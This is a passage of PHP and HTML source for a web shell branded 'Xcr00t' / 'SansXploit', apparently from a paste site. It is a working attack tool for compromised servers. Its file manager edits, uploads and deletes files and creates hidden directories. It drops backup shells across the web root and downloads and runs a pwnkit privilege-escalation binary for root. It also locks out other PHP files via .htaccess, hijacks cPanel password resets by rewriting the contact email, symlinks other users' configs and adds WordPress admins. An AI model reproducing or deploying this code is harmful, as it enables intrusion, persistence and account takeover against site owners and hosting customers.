} if (isset($_POST['save'])) { if (file_put_contents(PATH . DIRECTORY_SEPARATOR . $target, $_POST['content']) !== false) { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success'); } else { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed'); } exit; } if (isset($_GET['action'])) { switch ($_GET['action']) { case 'auto-shell': $rootDir = $_SERVER['DOCUMENT_ROOT']; try { create_files_in_subdirectories($rootDir, $url1); echo '<div class="alert alert-success alert-dismissible fade show" role="alert"> <strong>Success!</strong> Backup shells have been created successfully. <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div>'; } catch (Exception $e) { echo '<div class="alert alert-danger alert-dismissible fade show" role="alert"> <strong>Error!</strong> ' . htmlspecialchars($e->getMessage()) . ' <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div>'; } break; case 'adminer': $url = 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php'; if (@file_put_contents('adminer.php', @file_get_contents($url))) { header('Location: adminer.php'); } else { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed'); } exit; case 'pwnkit': if (!file_exists('pwnkit')) { @file_put_contents('pwnkit', @file_get_contents('https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit')); @chmod('pwnkit', 0755); $output = @shell_exec('./pwnkit "id" 2>&1'); file_put_contents('.root_output', $output); } header('Location: ?Xcr00t&p=' . enc(PATH) . '&terminal=root'); exit; case 'cpanel-reset': if (isset($_POST['email'])) { $path = dirname($_SERVER['DOCUMENT_ROOT']) . "/.cpanel/contactinfo"; $content = json_encode(['email' => $_POST['email']]); if (@file_put_contents($path, $content)) { header('Location: ' . $_SERVER['REQUEST_SCHEME'] . '://' . $_SERVER['SERVER_NAME'] . ':2083/resetpass?start=1'); exit; } } break; case 'backdoor': $htaccess = '<FilesMatch "\.ph(p[3457]?|t|tml)$"> Order Deny,Allow Deny from all </FilesMatch> <FilesMatch "^(' . basename($_SERVER['SCRIPT_FILENAME']) . '|index\.php)$"> Order Allow,Deny Allow from all </FilesMatch>'; if (@file_put_contents('.htaccess', $htaccess)) { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success'); } else { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed'); } exit; case 'mass-symlink': massSymlinkConfigs(extractSystemUsers()); header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success'); exit; case 'phpini': generatePhpIni(); header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success'); exit; } } // Handle download and delete if ($action === 'download' && $target && is_file(PATH . DIRECTORY_SEPARATOR . $target)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($target) . '"'); readfile(PATH . DIRECTORY_SEPARATOR . $target); exit; } if (isset($_GET['del'])) { $del = PATH . DIRECTORY_SEPARATOR . basename($_GET['del']); if (is_dir($del)) @rmdir($del); else @unlink($del); header('Location: ?Xcr00t&p=' . enc(PATH)); exit; } // Optimized directory listing with limited entries and caching $dirs = $files = []; if ($action === 'list') { static $dirCache = []; $cacheKey = md5(PATH); if (isset($dirCache[$cacheKey])) { list($dirs, $files) = $dirCache[$cacheKey]; } else { $items = scandir(PATH); $count = 0; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; if ($count >= SCAN_READ_LIMIT) break; $fullPath = PATH . DIRECTORY_SEPARATOR . $item; if (is_dir($fullPath)) { $dirs[] = $item; } else { $files[] = $item; } $count++; } $dirCache[$cacheKey] = [$dirs, $files]; // Limit cache size if (count($dirCache) > 10) { array_shift($dirCache); } } } // Handle hidden directory creation if (isset($_POST['newhiddendir'])) { $hiddenDirName = '.' . trim($_POST['hiddendirname']); $hiddenDirPath = PATH . DIRECTORY_SEPARATOR . $hiddenDirName; if (!file_exists($hiddenDirPath)) { if (@mkdir($hiddenDirPath, 0755, true)) { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success'); } else { header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed'); } } exit; } // Check pwnkit compatibility $is_compatible = check_pwnkit_compatibility(); $root_output = ''; if (isset($_GET['terminal']) && $_GET['terminal'] === 'root' && file_exists('.root_output')) { $root_output = file_get_contents('.root_output'); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title id="dynamic-title"><?= APP_NAME ?></title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> <script> // Animate title let titleText = document.getElementById("dynamic-title").innerHTML; let position = 0; setInterval(() => { position = (position + 1) % titleText.length; document.title = titleText.substring(position) + titleText.substring(0, position); }, 300); // Show time setInterval(() => { let now = new Date(); let time = now.toLocaleTimeString(); let date = now.toLocaleDateString(); document.getElementById("current-time").innerHTML = time; document.getElementById("current-date").innerHTML = date; }, 1000); </script> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" rel="stylesheet"> <style> :root { --primary-bg: #0a0c0f; --secondary-bg: #12151a; --text-color: #e6edf3; --border-color: #21262d; --hover-color: #161b22; --link-color: #2f81f7; --success-color: #238636; --danger-color: #da3633; --warning-color: #9e6a03; } /* Enhanced overall styling */ body { background: radial-gradient(circle at 20% 80%, rgba(120, 0, 255, 0.1) 0%, transparent 50%), radial-gradient(circle at 80% 20%, rgba(200, 0, 255, 0.1) 0%, transparent 50%), radial-gradient(circle at 40% 40%, rgba(100, 0, 200, 0.05) 0%, transparent 50%), linear-gradient(135deg, #0a0a0a 0%, #120929 50%, #0a0615 100%); color: #e6e6ff; font-family: 'Rajdhani', 'Courier New', monospace; min-height: 100vh; overflow-x: hidden; position: relative; } /* NEURAL NETWORK BACKGROUND */ .neural-network { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 0; pointer-events: none; } /* LOGO CONTAINER YANG DIPERBAIKI */ .logo-container { display: flex; align-items: center; gap: 20px; margin-bottom: 20px; flex-wrap: wrap; } .round-logo { width: 80px; height: 80px; border-radius: 50%; object-fit: cover; border: 3px solid #8a2be2; box-shadow: 0 0 20px rgba(138, 43, 226, 0.5), inset 0 0 10px rgba(138, 43, 226, 0.3); transition: all 0.4s ease; position: relative; overflow: hidden; background: linear-gradient(135deg, #8a2be2, #9400d3); display: flex; align-items: center; justify-content: center; color: white; font-weight: bold; font-size: 12px; text-align: center; padding: 5px; } .round-logo::before { content: ''; position: absolute; top: -50%; left: -50%; width: 200%; height: 200%; background: linear-gradient(45deg, transparent, rgba(255,255,255,0.1), transparent); transform: rotate(45deg); transition: all 0.6s ease; } .round-logo:hover::before { transform: rotate(45deg) translate(50%, 50%); } .round-logo:hover { transform: scale(1.15) rotate(5deg); box-shadow: 0 0 40px rgba(138, 43, 226, 0.8), 0 0 60px rgba(148, 0, 211, 0.4), inset 0 0 20px rgba(138, 43, 226, 0.5); border-color: #da70d6; } /* Efek pulsating untuk logo */ @keyframes logoPulse { 0%, 100% { box-shadow: 0 0 20px rgba(138, 43, 226, 0.5), inset 0 0 10px rgba(138, 43, 226, 0.3); } 50% { box-shadow: 0 0 30px rgba(138, 43, 226, 0.7), 0 0 40px rgba(148, 0, 211, 0.3), inset 0 0 15px rgba(138, 43, 226, 0.5); } } .round-logo { animation: logoPulse 3s ease-in-out infinite; } /* Container untuk logo dengan fallback */ .logo-fallback { width: 80px; height: 80px; border-radius: 50%; background: linear-gradient(135deg, #8a2be2, #9400d3); display: flex; align-items: center; justify-content: center; color: white; font-weight: bold; font-size: 10px; text-align: center; line-height: 1.2; padding: 8px; border: 3px solid #8a2be2; box-shadow: 0 0 20px rgba(138, 43, 226, 0.5); } /* FIX UNTUK KEDIPAN - System Information */ .server-info { background: linear-gradient(45deg, #2b3035, #212529) !important; border-radius: 8px; box-shadow: 0 2px 4px rgba(0,0,0,0.2); position: relative; z-index: 10; backdrop-filter: blur(10px); flex-grow: 1; } /* FIX UNTUK KEDIPAN - Notifikasi */ .alert { position: relative; z-index: 1000; backdrop-filter: blur(10px); animation: slideDown 0.3s ease-out; } @keyframes slideDown { from { opacity: 0; transform: translateY(-20px); } to { opacity: 1; transform: translateY(0); } } /* QUANTUM NAVBAR */ .quantum-navbar { background: rgba(10, 5, 25, 0.8) !important; backdrop-filter: blur(15px); border-bottom: 1px solid rgba(138, 43, 226, 0.3); box-shadow: 0 0 30px rgba(138, 43, 226, 0.2); } /* QUANTUM CARDS */ .quantum-card { background: rgba(10, 5, 25, 0.7) !important; border: 1px solid rgba(138, 43, 226, 0.3) !important; border-radius: 15px; backdrop-filter: blur(10px); box-shadow: 0 0 30px rgba(138, 43, 226, 0.1); color: #e6e6ff; } .quantum-card .card-header { background: rgba(138, 43, 226, 0.2) !important; border-bottom: 1px solid rgba(138, 43, 226, 0.3) !important; color: #da70d6; } /* QUANTUM BUTTONS */ .quantum-btn { background: linear-gradient(135deg, #8a2be2, #9400d3) !important; border: none !important; border-radius: 10px !important; color: white !important; transition: all 0.3s ease !important; } .quantum-btn:hover { transform: translateY(-2px); box-shadow: 0 5px 15px rgba(138, 43, 226, 0.4) !important; } /* FIX BACKGROUND TABLE - List File */ .quantum-table { background: rgba(10, 5, 25, 0.8) !important; border: 1px solid rgba(138, 43, 226, 0.3) !important; border-radius: 15px; backdrop-filter: blur(10px); box-shadow: 0 0 30px rgba(138, 43, 226, 0.1); color: #e6e6ff !important; overflow: hidden; } .quantum-table thead th { background: rgba(138, 43, 226, 0.2) !important; border-bottom: 1px solid rgba(138, 43, 226, 0.3) !important; color: #da70d6 !important; font-weight: 600; padding: 1rem; text-align: left; } .quantum-table tbody td { background: transparent !important; border-bottom: 1px solid rgba(138, 43, 226, 0.1) !important; color: #e6e6ff !important; padding: 0.8rem 1rem; vertical-align: middle; } .quantum-table tbody tr:hover { background: rgba(138, 43, 226, 0.1) !important; transition: all 0.3s ease; } .quantum-table tbody tr:last-child td { border-bottom: none !important; } /* Link colors in table */ .quantum-table a { color: #c9a0ff !important; text-decoration: none; transition: all 0.3s ease; } .quantum-table a:hover { color: #da70d6 !important; text-shadow: 0 0 10px rgba(218, 112, 214, 0.5); } /* Icon colors in table */ .quantum-table .fa-folder { color: #ffd700 !important; } .quantum-table .fa-php { color: #8a2be2 !important; } .quantum-table .fa-html5 { color: #ff6b6b !important; } .quantum-table .fa-css3 { color: #4dabf7 !important; } .quantum-table .fa-js { color: #ffd43b !important; } .quantum-table .fa-python { color: #ffd43b !important; } .quantum-table .fa-lock { color: #ff6b6b !important; } .quantum-table .fa-image { color: #51cf66 !important; } .quantum-table .fa-file { color: #adb5bd !important; } /* Button styles in table */ .quantum-table .btn { border-radius: 6px; transition: all 0.3s ease; } .quantum-table .btn-outline-primary { color: #8a2be2 !important; border-color: #8a2be2 !important; } .quantum-table .btn-outline-primary:hover { background: #8a2be2 !important; color: white !important; transform: translateY(-2px); } .quantum-table .btn-outline-success { color: #51cf66 !important; border-color: #51cf66 !important; } .quantum-table .btn-outline-success:hover { background: #51cf66 !important; color: white !important; transform: translateY(-2px); } .quantum-table .btn-outline-danger { color: #ff6b6b !important; border-color: #ff6b6b !important; } .quantum-table .btn-outline-danger:hover { background: #ff6b6b !important; color: white !important; transform: translateY(-2px); } /* Table responsive */ .table-responsive { border-radius: 15px; background: rgba(10, 5, 25, 0.3); backdrop-filter: blur(5px); padding: 1px; } .nav-hover { transition: all 0.3s ease; border: 1px solid transparent; } .nav-hover:hover { background: rgba(255,255,255,0.1); border: 1px solid rgba(255,255,255,0.2); transform: translateY(-2px); } .nav-link { color: rgba(255,255,255,0.8) !important; font-weight: 500; } .nav-link:hover { color: rgba(255,255,255,1) !important; } .navbar-nav { gap: 5px; } @keyframes blink { 0% { opacity: 1; } 50% { opacity: 0; } 100% { opacity: 1; } } .blink { animation: blink 1.5s infinite; margin-right: 8px; } .breadcrumb { background: linear-gradient(45deg, #2b3035, #212529) !important; box-shadow: 0 2px 4px rgba(0,0,0,0.2); } /* Container dengan z-index lebih tinggi */ .container-fluid { position: relative; z-index: 10; } /* Responsive improvements */ @media (max-width: 768px) { .logo-container { justify-content: center; text-align: center; } .round-logo { width: 60px; height: 60px; font-size: 9px; } .logo-fallback { width: 60px; height: 60px; font-size: 8px; } .server-info { font-size: 0.8rem; } } </style> </head> <body> <!-- NEURAL NETWORK BACKGROUND --> <canvas class="neural-network" id="neuralNetwork"></canvas> <!-- QUANTUM NAVBAR --> <nav class="navbar navbar-expand-lg quantum-navbar"> <div class="container-fluid"> <a class="navbar-brand text-light" href="?Xcr00t"> <i class="fas fa-terminal blink"></i> <?= APP_NAME ?> </a> <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarContent"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarContent"> <ul class="navbar-nav ms-auto"> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=adminer"> <i class="fas fa-database fa-fw me-2"></i> Adminer </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=pwnkit"> <i class="fas fa-user-shield fa-fw me-2"></i> Auto Root </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="#" data-bs-toggle="modal" data-bs-target="#wpAdminModal"> <i class="fab fa-wordpress fa-fw me-2"></i> WP Admin </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="#" data-bs-toggle="modal" data-bs-target="#cpanelModal"> <i class="fas fa-server fa-fw me-2"></i> cPanel Reset </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=backdoor"> <i class="fas fa-lock fa-fw me-2"></i> Anti Backdoor </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=phpini"> <i class="fas fa-cog fa-fw me-2"></i> PHP.ini </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=mass-symlink"> <i class="fas fa-link fa-fw me-2"></i> Mass Symlink </a> </li> <li class="nav-item"> <a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=auto-shell"> <i class="fas fa-terminal fa-fw me-2"></i> Backup Shell </a> </li> </ul> </div> </div> </nav> <div class="container-fluid py-4"> <?php if (isset($_GET['terminal']) && $_GET['terminal'] === 'root'): ?> <div class="compatibility-info <?= $is_compatible ? 'compatible' : 'not-compatible' ?>"> <h4> <i class="fas <?= $is_compatible ? 'fa-check-circle' : 'fa-times-circle' ?>"></i> Kernel Version: <?= suggest_exploit() ?> </h4> <p>Status: <?= $is_compatible ? 'Compatible with pwnkit exploit' : 'Not compatible with pwnkit exploit' ?></p> <?php if ($is_compatible): ?> <a href="?Xcr00t&p=<?= enc(PATH) ?>&action=pwnkit" class="btn quantum-btn"> <i class="fas fa-bolt"></i> Run Exploit </a> <?php endif; ?> </div> <?php if ($root_output): ?> <div class="terminal"><?= htmlspecialchars($root_output) ?></div> <?php endif; ?> <?php endif; ?> <!-- LOGO DAN SYSTEM INFORMATION YANG DIPERBAIKI --> <div class="logo-container"> <div class="logo-wrapper"> <img src="https://k.top4top.io/p_3594s1tnx0.jpg" alt="Xcr00toname x SansXploit" class="round-logo" onerror="this.style.display='none'; document.getElementById('logo-fallback').style.display='flex';"> <div id="logo-fallback" class="logo-fallback" style="display: none;"> Xcr00tM<br>×<br>SX </div> </div> <div class="server-info text-light p-3"> <div class="row"> <div class="col-md-6"> <small> <i class="fas fa-server"></i> Server: <?= $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown' ?><br> <i class="fas fa-network-wired"></i> IP: <?= $_SERVER['SERVER_ADDR'] ?? $_SERVER['LOCAL_ADDR'] ?? 'Unknown' ?><br> <i class="fas fa-user"></i> User: <?= get_current_user() ?> (<?= getmyuid() ?>) </small> </div> <div class="col-md-6"> <small> <i class="fas fa-microchip"></i> System: <?= php_uname() ?><br> <i class="fas fa-code"></i> PHP: <?= phpversion() ?><br> <i class="fas fa-folder-open"></i> Current Path: <?= getcwd() ?> </small> </div> </div> </div> </div> <!-- NOTIFIKASI --> <?php if (isset($_GET['status'])): ?> <div class="alert alert-<?= $_GET['status'] === 'success' ? 'success' : 'danger' ?> alert-dismissible fade show mt-3"> <?= $_GET['status'] === 'success' ? 'Operation completed successfully' : 'Operation failed' ?> <button type="button" class="btn-close" data-bs-dismiss="alert"></button> </div> <?php endif; ?> <nav aria-label="breadcrumb" style="margin-bottom: 1rem;"> <ol class="breadcrumb text-light p-3"> <li class="breadcrumb-item"> <a href="?Xcr00t&p=<?= enc($current_dir) ?>" style="color: #00ff9d; text-decoration: none; font-weight: 600;"> <i class="fas fa-home"></i> Root </a> </li> <?php $parts = explode(DIRECTORY_SEPARATOR, trim(PATH, DIRECTORY_SEPARATOR)); $path = ''; foreach ($parts as $part) { if (!$part) continue; $path .= DIRECTORY_SEPARATOR . $part; echo '<li class="breadcrumb-item">'; echo '<a href="?Xcr00t&p=' . enc($path) . '" style="color: #00b8ff; text-decoration: none; font-weight: 500;">' . $part . '</a>'; echo '</li>'; } ?> </ol> </nav> <div class="btn-toolbar mb-3"> <div class="btn-group me-2"> <button type="button" class="btn quantum-btn" data-bs-toggle="modal" data-bs-target="#uploadModal"> <i class="fas fa-upload"></i> Upload </button> <button type="button" class="btn quantum-btn" data-bs-toggle="modal" data-bs-target="#newDirModal"> <i class="fas fa-folder-plus"></i> New Folder </button> <button type="button" class="btn quantum-btn" data-bs-toggle="modal" data-bs-target="#newFileModal"> <i class="fas fa-file"></i> New File </button> <button type="button" class="btn btn-danger" data-bs-toggle="modal" data-bs-target="#newHiddenDirModal"> <i class="fas fa-folder-minus"></i> Hidden Folder </button> </div> </div> <!-- Hidden Directory Modal --> <div class="modal fade" id="newHiddenDirModal" tabindex="-1"> <div class="modal-dialog"> <div class="modal-content quantum-card"> <div class="modal-header"> <h5 class="modal-title">Create Hidden Directory</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button> </div> <form method="post"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">Directory Name</label> <input type="text" class="form-control bg-dark text-light" name="hiddendirname" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button> <button type="submit" name="newhiddendir" class="btn btn-danger">Create Hidden Directory</button> </div> </form> </div> </div> </div> <div class="table-responsive"> <table class="table table-hover quantum-table"> <thead> <tr> <th>Name</th> <th>Size</th> <th>Permissions</th> <th>Actions</th> </tr> </thead> <tbody> <?php if (PATH !== $current_dir): ?> <tr> <td> <a href="?Xcr00t&p=<?= enc(dirname(PATH)) ?>"> <i class="fas fa-level-up-alt"></i> .. </a> </td> <td>-</td> <td>-</td> <td>-</td> </tr> <?php endif; ?> <?php foreach ($dirs as $dir): ?> <tr> <td> <a href="?Xcr00t&p=<?= enc(PATH . DIRECTORY_SEPARATOR . $dir) ?>"> <i class="fas fa-folder text-warning"></i> <?= htmlspecialchars($dir) ?> </a> </td> <td>-</td> <td><?= perms(PATH . DIRECTORY_SEPARATOR . $dir) ?></td> <td> <div class="btn-group btn-group-sm"> <a href="?Xcr00t&p=<?= enc(PATH) ?>&del=<?= urlencode($dir) ?>" class="btn btn-outline-danger" onclick="return confirm('Delete directory?')"> <i class="fas fa-trash"></i> </a> </div> </td> </tr> <?php endforeach; ?> <?php foreach ($files as $file): ?> <?php $is_dir = is_dir(PATH . DIRECTORY_SEPARATOR . $file); ?> <tr> <td> <?php if ($is_dir): ?> <a href="?Xcr00t&p=<?= enc(PATH . DIRECTORY_SEPARATOR . $file) ?>"> <?= icon($file) ?> <?= htmlspecialchars($file) ?> </a> <?php else: ?> <a href="?Xcr00t&p=<?= enc(PATH) ?>&act=edit&file=<?= urlencode($file) ?>"> <?= icon($file) ?> <?= htmlspecialchars($file) ?> </a> <?php endif; ?> </td> <td><?= fmtSize(filesize(PATH . DIRECTORY_SEPARATOR . $file)) ?></td> <td><?= perms(PATH . DIRECTORY_SEPARATOR . $file) ?></td> <td> <div class="btn-group btn-group-sm"> <?php if (!$is_dir): ?> <a href="?Xcr00t&p=<?= enc(PATH) ?>&act=edit&file=<?= urlencode($file) ?>" class="btn btn-outline-primary"> <i class="fas fa-edit"></i> </a> <a href="?Xcr00t&p=<?= enc(PATH) ?>&act=download&file=<?= urlencode($file) ?>" class="btn btn-outline-success"> <i class="fas fa-download"></i> </a> <?php endif; ?> <a href="?Xcr00t&p=<?= enc(PATH) ?>&del=<?= urlencode($file) ?>" class="btn btn-outline-danger" onclick="return confirm('Delete <?= $is_dir ? 'folder' : 'file' ?>?')"> <i class="fas fa-trash"></i> </a> </div> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> </div> <!-- Modals --> <div class="modal fade" id="uploadModal"> <div class="modal-dialog"> <div class="modal-content quantum-card"> <div class="modal-header"> <h5 class="modal-title">Upload File</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button> </div> <form method="post" enctype="multipart/form-data"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">Select File</label> <input type="file" name="file" class="form-control bg-dark text-light" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button> <button type="submit" name="upload" class="btn quantum-btn">Upload</button> </div> </form> </div> </div> </div> <div class="modal fade" id="newDirModal"> <div class="modal-dialog"> <div class="modal-content quantum-card"> <div class="modal-header"> <h5 class="modal-title">New Folder</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button> </div> <form method="post"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">Folder Name</label> <input type="text" name="dirname" class="form-control bg-dark text-light" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button> <button type="submit" name="newdir" class="btn quantum-btn">Create</button> </div> </form> </div> </div> </div> <div class="modal fade" id="newFileModal"> <div class="modal-dialog"> <div class="modal-content quantum-card"> <div class="modal-header"> <h5 class="modal-title">New File</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button> </div> <form method="post"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">File Name</label> <input type="text" name="filename" class="form-control bg-dark text-light" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button> <button type="submit" name="newfile" class="btn quantum-btn">Create</button> </div> </form> </div> </div> </div> <!-- WP Admin Modal --> <div class="modal fade" id="wpAdminModal"> <div class="modal-dialog"> <div class="modal-content quantum-card"> <div class="modal-header"> <h5 class="modal-title">Add WordPress Admin</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button> </div> <form method="post"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">Database Host</label> <input type="text" name="db_host" class="form-control bg-dark text-light" value="localhost" required> </div> <div class="mb-3"> <label class="form-label">Database Name</label> <input type="text" name="db_name" class="form-control bg-dark text-light" required> </div> <div class="mb-3"> <label class="form-label">Database User</label> <input type="text" name="db_user" class="form-control bg-dark text-light" required> </div> <div class="mb-3"> <label class="form-label">Database Password</label> <input type="password" name="db_pass" class="form-control bg-dark text-light" required> </div> <hr> <div class="mb-3"> <label class="form-label">Admin Username</label> <input type="text" name="wp_user" class="form-control bg-dark text-light" required> </div> <div class="mb-3"> <label class="form-label">Admin Password</label> <input type="password" name="wp_pass" class="form-control bg-dark text-light" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button> <button type="submit" name="submit" class="btn quantum-btn">Create Admin</button> </div> </form> </div> </div> </div> <!-- cPanel Modal --> <div class="modal fade" id="cpanelModal"> <div class="modal-dialog"> <div class="modal-content quantum-card"> <div class="modal-header"> <h5 class="modal-title">cPanel Password Reset</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button> </div> <form method="post" action="?Xcr00t&p=<?= enc(PATH) ?>&action=cpanel-reset"> <div class="modal-body"> <div class="mb-3"> <label class="form-label">Email Address</label> <input type="email" name="email" class="form-control bg-dark text-light" required> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button> <button type="submit" class="btn quantum-btn">Reset Password</button> </div> </form> </div> </div> </div> <?php if ($action === 'edit' && $target): ?> <div class="modal fade show" style="display: block;"> <div class="modal-dialog modal-lg"> <div class="modal-content quantum-card"> <div class="modal-header"> <h5 class="modal-title">Edit: <?= htmlspecialchars($target) ?></h5> <button type="button" class="btn-close btn-close-white" onclick="history.back()"></button> </div> <form method="post"> <div class="modal-body"> <textarea name="content" class="form-control bg-dark text-light" style="height: 400px; font-family: monospace;"><?= htmlspecialchars(file_get_contents(PATH . DIRECTORY_SEPARATOR . $target)) ?></textarea> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" onclick="history.back()">Cancel</button> <button type="submit" name="save" class="btn quantum-btn">Save</button> </div> </form> </div> </div> </div> <div class="modal-backdrop fade show"></div> <?php endif; ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> <script> // Neural Network Animation - FIX KEDIPAN const canvas = document.getElementById('neuralNetwork'); const ctx = canvas.getContext('2d'); function resizeCanvas() { canvas.width = window.innerWidth; canvas.height = window.innerHeight; } resizeCanvas(); window.addEventListener('resize', resizeCanvas); class Node { constructor(x, y) { this.x = x; this.y = y; this.vx = (Math.random() - 0.5) * 0.3; this.vy = (Math.random() - 0.5) * 0.3; this.radius = Math.random() * 1.5 + 0.5; } update() { this.x += this.vx; this.y += this.vy; if (this.x < 0 || this.x > canvas.width) this.vx *= -1; if (this.y < 0 || this.y > canvas.height) this.vy *= -1; } draw() { ctx.beginPath(); ctx.arc(this.x, this.y, this.radius, 0, Math.PI * 2); ctx.fillStyle = `rgba(138, 43, 226, ${0.2 + Math.random() * 0.1})`; ctx.fill(); } } const nodes = []; for (let i = 0; i < 30; i++) { nodes.push(new Node(Math.random() * canvas.width, Math.random() * canvas.height)); } function animate() { ctx.fillStyle = 'rgba(10, 5, 25, 0.1)'; ctx.fillRect(0, 0, canvas.width, canvas.height); nodes.forEach(node => { node.update(); node.draw(); }); requestAnimationFrame(animate); } setTimeout(animate, 1000); // Auto-hide notifications after 5 seconds document.addEventListener('DOMContentLoaded', function() { const alerts = document.querySelectorAll('.alert'); alerts.forEach(alert => { setTimeout(() => { if (alert.parentNode) { alert.style.transition = 'all 0.5s ease'; alert.style.opacity = '0'; alert.style.transform = 'translateY(-20px)'; setTimeout(() => { if (alert.parentNode) { alert.remove(); } }, 500); } }, 5000); }); }); // Logo interaction enhancement document.addEventListener('DOMContentLoaded', function() { const logo = document.querySelector('.round-logo'); if (logo) { logo.addEventListener('mouseenter', function() { this.style.animation = 'none'; setTimeout(() => { this.style.animation = 'logoPulse 1s ease-in-out infinite'; }, 10); }); logo.addEventListener('mouseleave', function() { this.style.animation = 'logoPulse 3s ease-in-out infinite'; }); } }); </script> </body> </html>
Syntax Highlighting
Plain Text
PHP
JavaScript
Python
HTML
Expiration Time
Never
1 Hour
1 Day
1 Week
Visibility
Public
Private
Save Paste
Cancel